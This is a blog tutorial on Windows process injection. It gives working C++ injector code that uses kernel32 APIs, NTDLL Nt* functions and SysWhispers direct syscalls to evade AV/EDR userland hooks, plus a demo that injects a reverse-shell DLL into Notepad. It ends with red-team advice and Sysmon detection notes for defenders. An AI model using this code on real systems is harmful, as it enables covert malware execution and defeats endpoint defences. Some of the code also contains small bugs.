Path to Process Injection — Bypass Userland API Hooking

Seemant Bisht
23 min readNov 27, 2020

--

Introduction

My last post discussed processes, process tokens, and token abuse. Where we learned about the process and opening process handle to interact with the target process. This blog will cover more on process injection techniques and how can we evade userland API hooking which is being used by AV/EDR security products to detect injection techniques. My main purpose to write this blog was to understand the injection code holistically. I have covered and tried to explain most of the queries which everyone would have while learning about this topic. I have listed below the queries which I had in mind regarding process injection before reading about it.

  • What is process injection?
  • Why do we need to learn about process injection?
  • What do we actually inject?
  • How do we know where to inject?
  • Is the process injection technique different for 32 bit and 64-bit processes?
  • How to perform a basic process injection technique?
  • Can this technique bypass the latest AV/EDR solutions?

There is more for the readers, I will start with a brief overview of process injection and how to use userland APIs (OpenProcess, VirtualAllocEx, WriteProcessMemory, and CreateRemoteThread) to perform a classic CreateRemoteThread DLL Injection. Then we will steer into NTDLL functions (NtOpenProcess, NtAllocateVirtualMemory, NtWriteVirtualMemory, NtCreateThreadEx) aka. Kernel APIs and finally invoking Syscalls (System Calls) directly to perform DLL injection that bypasses the userland API hooking performed by AV/EDR solutions to detect the injection technique.

What is process injection?

An injection is an act of administering a liquid, especially a drug, into a person’s body using a needle (usually a hypodermic needle) and a syringe.

Similarly, a Process injection is an act of administering a malicious code, especially a payload, into a process using windows APIs.

According to MITRE | ATT&CK: “Process injection is a method of executing arbitrary code in the address space of a separate live process.”

Why do we need to learn about process injection?

  • Most widely used post-exploitation technique almost in every red team assessment and is equipped in almost all Command & Control application/software such as Cobalt Strike, Mythic C2, Covenant, Metasploit;
  • This technique is widely used by malware to gain stealth while performing malicious operations on the system;
  • Running malicious logic in a legitimate process could help bypass security products (e.g. AV, EDR, DLP, and personal firewall solutions);
  • Attackers want to be stealthy to avoid detection;
  • Running an unrecognized executable is easily detected;
  • Malicious code would rather hide inside a legitimate process;

Is the process injection technique independent of architecture?

It depends on the process injection technique we are using. The technique we have used in this blog has a limitation that you could only inject into processes of the same architecture of the calling process. So, 32-bit processes could only inject into other 32-bit processes, and 64-bit processes could only inject into 64-bit processes. This blog doesn’t target explaining this. It will be covered in future blogs.

What do we actually inject?

We can inject:

1. Entire portable executable (PE) into another running process such as injecting a reverse shellcode binary or executable;

2. DLL can be injected into another running process such as injecting Mimikatz or Seatbelt DLL;

3. Shellcode can be injected into another running process such as injecting a reverse meterpreter shellcode. Additionally, we can convert any DLL into a shellcode using Shellcode Reflective DLL Injection (sRDI) technique;

4. Return Object Programming (ROP) gadget can be injected into a PE file which can further be injected into another running process;

How do we know where to inject?

This depends on the injection technique that we are using. Process structure contains multiple sections such as Image, Mapped File, Shareable, Heap, Managed Heap, Stack, and Private Data. We can use different techniques to inject into different sections of the Process. In this blog, we are targeting injecting DLL into the Image section of the process.

How to perform a basic process injection technique?

Let’s start with the basic Process injection technique using Kernel32 APIs such as OpenProcess, VirtualAllocEx, WriteProcessMemory, and CreateRemoteThread. In this technique, we will create a thread in a target process and use it to load the desired DLL or shellcode. The below diagram shows the steps involved in this injection technique.

Steps to understand DLL injection Flow

The steps mentioned in the above screenshot:

  1. The malware process opens a handle to the target process using the OpenProcess function.
  2. Now the process handle can be passed to the GetProcAddress function to get the address of the LoadLibraryA function residing inside the kernel32.dll library. LoadLibrary can be used to load a library module into the address space of the process and return a handle that can be used in GetProcAddress to get the address of a DLL function. For our DLL to be loaded, we must pass a DLL path to the LoadLibraryA function, but the name needs to be stored somewhere inside the processes address space.
  3. Obviously, it’s highly unlikely for the path to our DLL to already be present somewhere in the process’s address space, which is why we need the next two functions: VirtualAllocEx and WriteProcessMemory. The first function allocates a new memory range inside the process’s address space. The size of that memory region needs to be only as large to fit the name of the DLL inside it; usually, the size is rounded up to occupy at least one page. The WriteProcessMemory is the function that actually writes the path of our DLL to the victim’s address space.
  4. At last, the CreateRemoteThread is called that calls the LoadLibraryA function inside the victim’s address space to inject a DLL into it.

Note: Terminal Services isolates each terminal session by design. Therefore, CreateRemoteThread fails if the target process is in a different session than the calling process.

Let’s relate the above steps with the code below:

Github: https://github.com/SecurityTimes/Process-Injection/blob/main/RemoteThreadInjection.cpp

Let’s understand the syntax of the various functions used above and their parameters.

  1. OpenProcess:

OpenProcess(): This function allows us to open a handle to the target process.

Syntax:

HANDLE OpenProcess(DWORD dwDesiredAccess, BOOL bInheritHandle, DWORD dwProcessId);

The OpenProcess() function accepts three inputs which are explained below:

  • dwDesiredAccess: Access to the process object. This access right is checked against the security descriptor for the process. If the caller has enabled the SeDebugPrivilege privilege, the requested access is granted regardless of the contents of the security descriptor. Here, we have assigned three access rights:

PROCESS_VM_WRITE: Required to write to memory in a process using WriteProcessMemory. Here we are using the WriteProcessMemory to write DLL pathname to the allocated memory by the VirtualAllocEx function.

PROCESS_VM_OPERATION: Required to operate on the address space of a process. Here in our code, we are using the VirtualAllocEx function to reserve, commit, or change the state of a region of memory within the virtual address space of a specified process (target process).

Note: VirtualAllocEx is the extended form of VirtualAlloc. VirtualAllocEx extends the capability of the VirtualAlloc function to reserve memory in a remote process. Through VirtualAlloc, we can reserve memory only in the current process.

PROCESS_CREATE_THREAD: Required to create a thread. Here in our code, it will be required by the CreateRemoteThread function,

  • bInheritHandle: If this value is TRUE, processes created by this process will inherit the handle. Otherwise, the processes do not inherit this handle. Here in our code, we do not need inheritance.
  • dwProcessId: The identifier of the local process to be opened. Here in our code, this parameter value will be accepted by the user via the command line.

2. GetProcAddress:

GetProcAddress(): Retrieves the address of an exported function or variable from the specified dynamic-link library (DLL).

Syntax:

FARPROC GetProcAddress(HMODULE hModule, LPCSTR lpProcName);

The GetProcAddress function takes two inputs:

  • hModule

A handle to the DLL module that contains the function or variable. The LoadLibrary, LoadLibraryEx, LoadPackagedLibrary, or GetModuleHandle function returns this handle. Here in the code, a handle to the kernel32.dll module is obtained which contains the LoadLibraryA function.

Note: The GetProcAddress function does not retrieve addresses from modules that were loaded using the LOAD_LIBRARY_AS_DATAFILE flag.

  • lpProcName

The function or variable name, or the function’s ordinal value. If this parameter is an ordinal value, it must be in the low-order word; the high-order word must be zero. Here in our code, we want the address of the LoadLibraryA function. Therefore, we will pass LoadLibraryA as the function name.

LoadLibraryA Loads the specified module (our malicious DLL) into the address space of the calling process. The specified module may cause other modules to be loaded.

Syntax:

HMODULE LoadLibraryA(LPCSTR lpLibFileName);

lpLibFileName is the name of the module. There are few things to note about lpLibFileName:

  • This can be either a library module (a .dll file) or an executable module (a .exe file).
  • If the string specifies a full path, the function searches only that path for the module.
  • If the string specifies a relative path or a module name without a path, the function uses a standard search strategy to find the module.
  • If the function cannot find the module, the function fails. When specifying a path, be sure to use backslashes (\), not forward slashes (/).
  • If the string specifies a module name without a path and the file name extension is omitted, the function appends the default library extension .dll to the module name. To prevent the function from appending .dll to the module name, include a trailing point character (.) in the module name string.
  • If the function succeeds, the return value is a handle to the module.

3. VirtualAllocEx function:

Reserves, commit, or changes the state of a region of memory within the virtual address space of a specified process. The function initializes the memory it allocates to zero.

Syntax:

LPVOID VirtualAllocEx(HANDLE hProcess, //* The handle to a process. The function allocates memory within the virtual address space of this process. The handle must have the PROCESS_VM_OPERATION access right.LPVOID lpAddress, //* The pointer that specifies a desired starting address for the region of pages that you want to allocate. If lpAddress is NULL, the function determines where to allocate the region.SIZE_T dwSize, //* The size of the region of memory to allocate, in bytes. Length of DLL pathname supplied as a command line argument is passed as the value.DWORD flAllocationType, //* The type of memory allocation. We are reserving the memory space and instantly committing it therefore MEM_COMMIT and MEM_RESERVE values are passed.DWORD flProtect //* The memory protection for the region of pages to be allocated. We need read and write access to the allocated memory for writing the dll path via the WriteProcessMemory.);

4. WriteProcessMemory:

Writes data to an area of memory in a specified process.

Syntax:

BOOL WriteProcessMemory(HANDLE hProcess, //* A handle to the process memory to be modified. The handle must have PROCESS_VM_WRITE and PROCESS_VM_OPERATION access to the process.LPVOID lpBaseAddress, //* A pointer to the base address in the specified process to which data is written. Before data transfer occurs, the system verifies that all data in the base address and memory of the specified size is accessible for write access, and if it is not accessible, the function fails.LPCVOID lpBuffer, //* A pointer to the buffer that contains data to be written in the address space of the specified process.SIZE_T nSize, //* The number of bytes to be written to the specified process.SIZE_T *lpNumberOfBytesWritten //* A pointer to a variable that receives the number of bytes transferred into the specified process. This parameter is optional. If lpNumberOfBytesWritten is NULL, the parameter is ignored.);

5. CreateRemoteThread:

The CreateRemoteThread function creates a thread in the virtual address space of the target process.

Syntax:

HANDLE CreateRemoteThread(HANDLE hProcess, //* Handle to the process where we’ll create a new thread.LPSECURITY_ATTRIBUTES lpThreadAttributes, //* A pointer to the SECURITY_ATTRIBUTES structure, which specifies the security attributes of the new thread: if NULL, the thread will have default security attributes and the handle cannot be inherited by the child processSIZE_T dwStackSize, //* Initial size of the stackLPTHREAD_START_ROUTINE lpStartAddress, //* A pointer to the LPTHREAD_START_ROUTINE, which is a function that will be executed by the new thread. It’s needless to say that the function must exists in the remote process.LPVOID lpParameter, //* A pointer to a variable to be passed to the thread functionDWORD dwCreationFlags, //* A value that controls the creation of the threadLPDWORD lpThreadId //* A pointer to a variable that receives the thread ID);

Now, we have a sound understanding of how the code works and what are we trying to achieve. Let’s move to practical.

Practical Demo:

We will create a 64bit reverse shell DLL payload as we will be injecting this into a 64bit process i.e., Notepad process in our case.

Open a reverse handler listening on port 443 as specified in the payload above.

Open Notepad and find the Process ID via Process Hacker or Windows TaskManager:

Compile the RemoteThreadInjection.cpp and execute the RemoteThreadInjection.exe as shown below:

Shell spawned:

Now, let's find the injected DLL inside the Notepad process module section where the DLL’s are loaded.

Note: In the above screenshot, we can see the base address of the reverse64.dll.

To find out in which section of the process our DLL is loaded, we can use VMMAP (a Sysinternals tool that gives you the memory mapping within a process).

Below are the various sections of the Notepad process:

Our reverse64.dll payload is loaded in the image section:

We can see that VirtualAllocEx() allocated a buffer located at 0x7ff997520000. This memory allocation should be within the notepad.exe process space. To confirm, we can open the notepad.exe process in ProcessHacker -→ properties -→ memory and look for the memory region shown below:

Note: An important point to note is that when an executable image (such as EXE or DLL) is normally loaded into the memory, that memory region is given memory protection of PAGE_EXECUTE_WRITECOPY(WCX) by the operating system.

Does this technique bypass AV/EDR solutions?

No, this technique is quite old, it doesn’t bypass AV/EDR solutions. This blog only focuses on making the process injection easily understandable for the readers. I have tried to make it as simple as possible. I will keep on adding defense evasion techniques in the upcoming blogs one by one so that it is more relatable.

Why the above technique doesn’t bypass AV/EDR solutions?

The API/ functions (VirtualAllocEx, WriteProcessMemory, CreateRemoteThread), we used in the above code are executed in the user space where EDR/ AV solutions perform API hooking. API hooking is a technique by which we can instrument and modify the behavior and flow of API calls. Windows API hooking is one of the techniques used by AV/EDR solutions to determine if code is malicious.

“Security software will hook specific userspace API functions that are commonly used by malware. For example, a code hook installed on winsock.connect can examine the IP and port of an outgoing network connection and decide whether the connection should be allowed or blocked. A combination of hooks installed on OpenProcess, VirtualAllocEx, WriteProcessMemory, and CreateRemoteThread detect malicious process injection.” — Ref: here

Let’s analyze API calls in our scenario. We will pass the RemoteThreadCreate.exe process and the arguments (PID and DLL Path Name) to the API Monitoring tool configured with Data Access and Storage, NT Native, System Services, Undocumented API filters. As we perform the Static import by selecting the option, we can see all the API calls made by our program as shown in the screenshot below:

If we look at the KERNELBASE module and the associated APIs invoked, we will be able to find out functions that are running under the Kernel level which performs the final action. These lower-level API function calls are translated from userland API calls by the OS, which we are using in our initial code above.

Now we know that the APIs which we are using from userland (KERNEL32.DLL) are being translated to lower-level APIs resident within NTDLL.DLL which are undocumented. (Note: You will not find the syntax or prototype for some NTDLL native APIs in the Microsoft Documentation. Researchers have made the prototype available publicly which we can use.)

If we can directly use the lower-level APIs resident within NTDLL.DLL, we would be able to stay below the AV/EDR radar (though not completely).

Note: There is one benefit of using the lower-level APIs that it allows any process to inject DLL into any other process irrespective of the session in which it is running as long as it has sufficient privileges.

Kernel APIs

RemoteThreadInjection via NTDLL APIs

The functions which we will be using in our code are undocumented. Therefore, we have to define the structure for each function and its associated parameters. Below is the list of functions which we will be using in our program:

1. NtOpenProcess

Syntax:

__kernel_entry NTSYSCALLAPI NTSTATUS NtOpenProcess(PHANDLE ProcessHandle, // [out] A pointer to a variable of type HANDLE. The ZwOpenProcess routine writes the process handle to the variable that this parameter points to.ACCESS_MASK DesiredAccess, // [in] An ACCESS_MASK value that contains the access rights that the caller has requested to the process object.POBJECT_ATTRIBUTES ObjectAttributes, // [in] A pointer to an OBJECT_ATTRIBUTES structure that specifies the attributes to apply to the process object handle. This has to be defined and initialized prior to opening the handle.PCLIENT_ID ClientId // [in, optional] A pointer to a client ID that identifies the thread whose process is to be opened.);

To use the NtOpenProcess function, we have to define its definition in our code.

typedef NTSTATUS(NTAPI* _NtOpenProcess)(PHANDLE ProcessHandle, ACCESS_MASK AccessMask, POBJECT_ATTRIBUTES ObjectAttributes, PCLIENT_ID ClientID);

Similarly, OBJECT_ATTRIBUTES AND CLIENT_ID need to be defined. These structures are defined under NT Kernel header files which we can’t use directly in our code, until and unless we have imported respective header files. As can be seen in the screenshots below:

OBJECT_ATTRIBUTES:

Syntax:

typedef struct _OBJECT_ATTRIBUTES{ULONG Length;HANDLE RootDirectory;PUNICODE_STRING ObjectName;ULONG Attributes;PVOID SecurityDescriptor;PVOID SecurityQualityOfService;} OBJECT_ATTRIBUTES, * POBJECT_ATTRIBUTES;

CLIENT_ID:

typedef struct _CLIENT_ID{PVOID UniqueProcess;PVOID UniqueThread;} CLIENT_ID, * PCLIENT_ID;

Before returning the handle by the NtOpenProcess function/ routine, the Object Attributes need to be initialized which can be applied to the handle. To initialize the Object Attributes an IntitializeObjectAttributes macro is defined and invoked which specifies the properties of an object handle to routines that open handles.

VOID InitializeObjectAttributes([out] POBJECT_ATTRIBUTES p, // A pointer to the OBJECT_ATTRIBUTES structure to initialize.[in] PUNICODE_STRING n, // A pointer to a Unicode string that contains the name of the object for which a handle is to be opened.[in] ULONG a, // This specifies the flag that is applicable to the object handle.[in] HANDLE r, // A handle to the root object directory for the path name specified in the ObjectName parameter. If ObjectName is a fully qualified object name, RootDirectory is NULL.[in, optional] PSECURITY_DESCRIPTOR s // Specifies a security descriptor to apply to an object when it is created. This parameter is optional. Drivers can specify NULL to accept the default security for the object.);

Similarly, the UNICODE_STRING structure needs to be defined which is a second input parameter that is being used by the IntializeObjectAttributes macro.

Note: Without defining the above structs the code will not run. These are the dependencies that have to be defined.

Now, let's see how our NtOpenProcess Definition looks like:

typedef struct _CLIENT_ID{PVOID UniqueProcess;PVOID UniqueThread;} CLIENT_ID, * PCLIENT_ID;typedef struct _UNICODE_STRING{USHORT Length;USHORT MaximumLength;PWSTR Buffer;} UNICODE_STRING, * PUNICODE_STRING;typedef struct _OBJECT_ATTRIBUTES{ULONG Length;HANDLE RootDirectory;PUNICODE_STRING ObjectName;ULONG Attributes;PVOID SecurityDescriptor;PVOID SecurityQualityOfService;} OBJECT_ATTRIBUTES, * POBJECT_ATTRIBUTES;#define InitializeObjectAttributes(p, n, a, r, s) \{ \(p)->Length = sizeof(OBJECT_ATTRIBUTES); \(p)->RootDirectory = r; \(p)->Attributes = a; \(p)->ObjectName = n; \(p)->SecurityDescriptor = s; \(p)->SecurityQualityOfService = NULL; \}typedef NTSTATUS(NTAPI* _NtOpenProcess)(PHANDLE ProcessHandle, ACCESS_MASK AccessMask, POBJECT_ATTRIBUTES ObjectAttributes, PCLIENT_ID ClientID);

2. NtAllocateVirtualMemory

The NtAllocateVirtualMemory routine reserves, commit, or both, a region of pages within the user-mode virtual address space of a specified process.

Syntax:

__kernel_entry NTSYSCALLAPI NTSTATUS NtAllocateVirtualMemory(HANDLE ProcessHandle, // [in] A handle for the process for which the mapping should be done.PVOID *BaseAddress, // [in, out] A pointer to a variable that will receive the base address of the allocated region of pages.ULONG_PTR ZeroBits, // [in] The number of high-order address bits that must be zero in the base address of the section view.PSIZE_T RegionSize, // [in, out] A pointer to a variable that will receive the actual size, in bytes, of the allocated region of pages.ULONG AllocationType, // [in] A bitmask containing flags that specify the type of allocation to be performed for the specified region of pages.ULONG Protect // A bitmask containing page protection flags that specify the protection desired for the committed region of pages.);//In order to use NtAllocateVirtualMemory function, we have to define its definition in our code.typedef NTSTATUS(WINAPI* NAVM)(HANDLE, PVOID, ULONG, PULONG, ULONG, ULONG);

2. NtWriteVirtualMemory

Syntax:

NtWriteVirtualMemory(IN HANDLE ProcessHandle, // [in] A handle for the process for which the mapping should be done.IN PVOID BaseAddress, // [in] The base address of the allocated region of pages.IN PVOID Buffer,IN ULONG NumberOfBytesToWrite,OUT PULONG NumberOfBytesWritten OPTIONAL );//In order to use NtWriteVirtualMemory function, we have to define its definition in our code.typedef NTSTATUS(NTAPI* NWVM)(HANDLE, PVOID, PVOID, ULONG, PULONG);

3. NtCreateThreadEx

Syntax:

typedef NTSTATUS (WINAPI *LPFUN_NtCreateThreadEx)(OUT PHANDLE hThread,IN ACCESS_MASK DesiredAccess,IN LPVOID ObjectAttributes,IN HANDLE ProcessHandle,IN LPTHREAD_START_ROUTINE lpStartAddress,IN LPVOID lpParameter,IN BOOL CreateSuspended,IN ULONG StackZeroBits,IN ULONG SizeOfStackCommit,IN ULONG SizeOfStackReserve,OUT LPVOID lpBytesBuffer);typedef NTSTATUS(NTAPI* NCT)(PHANDLE, ACCESS_MASK, POBJECT_ATTRIBUTES, HANDLE, PVOID, PVOID, ULONG, SIZE_T, SIZE_T, SIZE_T, PPS_ATTRIBUTE_LIST);

For invoking NtCreateThreadEx, we have to define PPS_ATTRIBUTE_LIST :

typedef struct _PS_ATTRIBUTE{ULONG Attribute;SIZE_T Size;union{ULONG Value;PVOID ValuePtr;} u1;PSIZE_T ReturnLength;} PS_ATTRIBUTE, * PPS_ATTRIBUTE;typedef struct _PS_ATTRIBUTE_LIST{SIZE_T TotalLength;PS_ATTRIBUTE Attributes[1];} PS_ATTRIBUTE_LIST, * PPS_ATTRIBUTE_LIST;

Till now, we have defined all the dependencies that will be required to execute the NT functions. In the below section, I have explained the working of the main code. There are three methods to perform this technique:

  1. Pass the Process ID and DLL PATH NAME as command-line arguments
  2. Hardcode the DLL PATH NAME inside the attacker’s code.
  3. Hardcode the shellcode in the attacker’s code.

Below is the code for point no. 1:

Code:

int main(int argc, const char* argv[]) {//Taking two command line argument (ProcessID, DLL PATH NAME) as inputif (argc < 3) {printf(“Usage: RemoteThreadInjection <PID> <DLL PATH NAME>\n”);return 0;}const unsigned char* shellcode = NULL;shellcode = (const unsigned char*)argv[2]; //Assigned the value of DLL PATH NAME to shellcode variableLPVOID allocation_start; // A pointer to a variable that will receive the base address of the allocated region of pages i.e., shellcode.SIZE_T allocation_size = sizeof(shellcode); // Size of allocated region of pages i.e., shellcode, in bytesHANDLE hProcess, hThread; // Handle to the process or the threadNTSTATUS status; // This parameter will store the severity status of the function assigned. Severity status could be any of these Success, Warning, Informational and ErrorOBJECT_ATTRIBUTES objAttr;int pid = atoi(argv[1]); //This parameter will receive the command line argument i.e., process ID of the target processCLIENT_ID cID;InitializeObjectAttributes(&objAttr, NULL, 0, NULL, NULL); //This macro or the function will be used by the NtOpenProcess function to return a handle with the specified Object AttributescID.UniqueProcess = (PVOID)pid;cID.UniqueThread = 0;HINSTANCE hNtdll = LoadLibrary(L”ntdll.dll”); // Loading the NTDLL.DLL Library to invoke the functions residing within it_NtOpenProcess NtOpenProcess = (_NtOpenProcess)GetProcAddress(hNtdll, “NtOpenProcess”); // Invoking GetProcAddress function to return the starting address of the NtOpenProcess function.NAVM NtAllocateVirtualMemory = (NAVM)GetProcAddress(hNtdll, “NtAllocateVirtualMemory”); // Invoking GetProcAddress function to return the starting address of the NtAllocateVirtualMemory function.NWVM NtWriteVirtualMemory = (NWVM)GetProcAddress(hNtdll, “NtWriteVirtualMemory”); // Invoking GetProcAddress function to return the starting address of the NtWriteVirtualMemory function.NCT NtCreateThreadEx = (NCT)GetProcAddress(hNtdll, “NtCreateThreadEx”); // Invoking GetProcAddress function to return the starting address of the NtCreateThreadEx function.allocation_start = nullptr;status = NtOpenProcess(&hProcess, PROCESS_VM_WRITE | PROCESS_VM_OPERATION | PROCESS_CREATE_THREAD , &objAttr, &cID); // Retrieving handle to the remote processif (!hProcess)return Error(“Failed to open process”);status = NtAllocateVirtualMemory(hProcess, &allocation_start, 0, (PULONG)&allocation_size, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE); // Allocating Memorystatus = NtWriteVirtualMemory(hProcess, allocation_start, (PVOID)shellcode, allocation_size, 0); // Writing shellcode to virtual memory of remote processstatus = NtCreateThreadEx(&hThread, GENERIC_EXECUTE, NULL, hProcess, (LPTHREAD_START_ROUTINE)GetProcAddress(GetModuleHandle(L”kernel32.dll”), “LoadLibraryA”), allocation_start, FALSE, NULL, NULL, NULL, nullptr); // Creating Remote Thread that will trigger the shellcode. (LPTHREAD_START_ROUTINE)GetProcAddress(GetModuleHandle(L”kernel32.dll”), “LoadLibraryA”) is used here because we are loading a DLL. In the other two scenarios, where we don’t have to load DLL, we can just pass the parameter 'allocation_start'WaitForSingleObject(hThread, 5000);VirtualFreeEx(hProcess, buffer, 0, MEM_RELEASE);CloseHandle(hProcess);return 0;}

Github: https://github.com/SecurityTimes/Process-Injection/blob/main/RemoteThreadInjectionNTDLLFunct_DLLLoading.cpp

Practical Demo:

Let’s inject the DLL into the “Notepad++.exe” process. The PID is 19096 as shown below:

Let’s look at our API calls in API Monitor:

Still, we can see and predict that this will also be detected. As we can see the pattern of the instructions highlighted above. Though, we can see that the overhead calls are reduced from 270 to 171.

In the below-mentioned API calls, we can see that loading of ntdll.dll library and then locating the various functions within it creates a lot of API calls. Therefore, we’re going to completely remove any Windows DLL loading and manually conduct the Syscalls with our own custom assembly rather than having ntdll.dll or kernelbase.dll do it for us.

Direct Syscalls

Using Direct Syscalls for RemoteThreadInjection

To this point, we’ve used the Windows High-Level MSDN Documented methods of accessing process memory, changing process memory, and creating a remote thread within an external process. Next, we went one step lower and manually mapped the Nt* functions residing within ntdll.dll to our program and called them directly. Now, we’re going to completely remove any Windows DLL imports and manually conduct the Syscalls with our own custom assembly rather than having ntdll.dll or kernelbase.dll do it for us.

For generating the ASM and the header file we will be using Syswhispers. SysWhispers helps with evasion by generating header/ASM files, implants can use to make direct system calls. The functions in ntdll.dll that make the syscalls consist of just a few assembly instructions, so re-implementing them in your own implant can bypass the triggering of those security product hooks. SysWhispers provides red teamers with the ability to generate header/ASM pairs for any system call in the core kernel image (ntoskrnl.exe) across any Windows version starting from XP. The headers will also include the necessary type of definitions.

Generating the asm and header files for our code and copy the generated H/ASM files into the project folder.:

How does the ASM look like?

We will be calling these instructions directly.

What does the header files include?

It includes all the type definitions which we were manually inserting to invoke NTDLL function APIs.

To enable Assembly language support in Visual Studio, go to Project →Properties →Build Customizations… and enable MASM.

In the Solution Explorer, add the syscalls.h and syscalls.asm files to the project as header and source files, respectively.

Go to the properties of the syscalls.asm file, and set the Item Type to Microsoft Macro Assembler:

Now we have type definition already defined in Header file, syscalls.h. We can modify our code by removing the TYPE definition we made earlier for all NTDLL functions. Below is the modified code:

#include <Windows.h>#include <stdio.h>#include “syscalls.h”int Error(const char* str) {printf(“%s (%u)\n”, str, GetLastError());return 1;}int main(int argc, const char* argv[]) {if (argc < 3) {printf(“Usage: RemoteThreadInjection <PID>\n”);return 0;}const unsigned char* shellcode = NULL;shellcode = (const unsigned char*)argv[2];LPVOID allocation_start;SIZE_T allocation_size = sizeof(shellcode);HANDLE hProcess, hThread;int pid = atoi(argv[1]);CLIENT_ID cid;cid.UniqueProcess = (PVOID)pid;cid.UniqueThread = 0;allocation_start = nullptr;OBJECT_ATTRIBUTES objAttr;InitializeObjectAttributes(&objAttr, NULL, 0, NULL, NULL);NtOpenProcess(&hProcess, PROCESS_ALL_ACCESS, &objAttr, &cid);if (!hProcess)return Error(“Failed to open process”);NtAllocateVirtualMemory(hProcess, &allocation_start, 0, &allocation_size, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);NtWriteVirtualMemory(hProcess, allocation_start, (PVOID)shellcode, allocation_size, 0);NtCreateThreadEx(&hThread, GENERIC_EXECUTE, NULL, hProcess, (LPTHREAD_START_ROUTINE)GetProcAddress(GetModuleHandle(L”kernel32.dll”), “LoadLibraryA”), allocation_start, FALSE, NULL, NULL, NULL, nullptr);return 0;}

Let’s look at the API calls for the above program using API Monitor:

We don’t see the suspicious pattern that we have seen during previous API calls. That’s because we did not load any external resources(NTDLL) to conduct the Syscall. We can still see GetModuleHandleW and GetProcAddress as we have used these two functions to load our DLL. This can also be avoided if we use shellcode instead of DLL.

Though we can avoid Userland API hooking still these API calls will be logged in to Sysmon events as Sysmon hooking is running in Kernel-Land (SYSTEM).

Lets quickly look at the Sysmon events for all the three scenarios we have performed above:

1. Sysmon logs when we used Kernel32 functions/ APIs (OpenProcess, AllocateVirtualMemoryEx, WriteVirtualMemory, CreateRemoteThread)

2. Sysmon logs when we used NTDLL functions/ APIs (NtOpenProcess, NtAllocateVirtualMemory, NtWriteVirtualMemory, NtCreateThreadEx):

3. Sysmon logs when we used Direct Syscalls:

Conclusion

Red Team

We can evade userland API Hooking by using Direct Syscalls. Mixing this technique with others such as PPID Spoofing, Arbitrary Code Guard, sRDI or off-binary payload ingestion, BlockDLLs, AMSI/ETW Bypass, etc. can allow us to operate with less noise.

Blue Team

As shown in the blog, Sysmon can detect API hooking for all three scenarios. It's a Free Windows SysInternal tool with several features that should be rolled into your detection processes. Below are a few best blogs which I highly recommend:

References:

Note: In case I have missed any reference, please let me know and I’ll add that to the list. Apologies in advance. Happy Learning!😊

--

--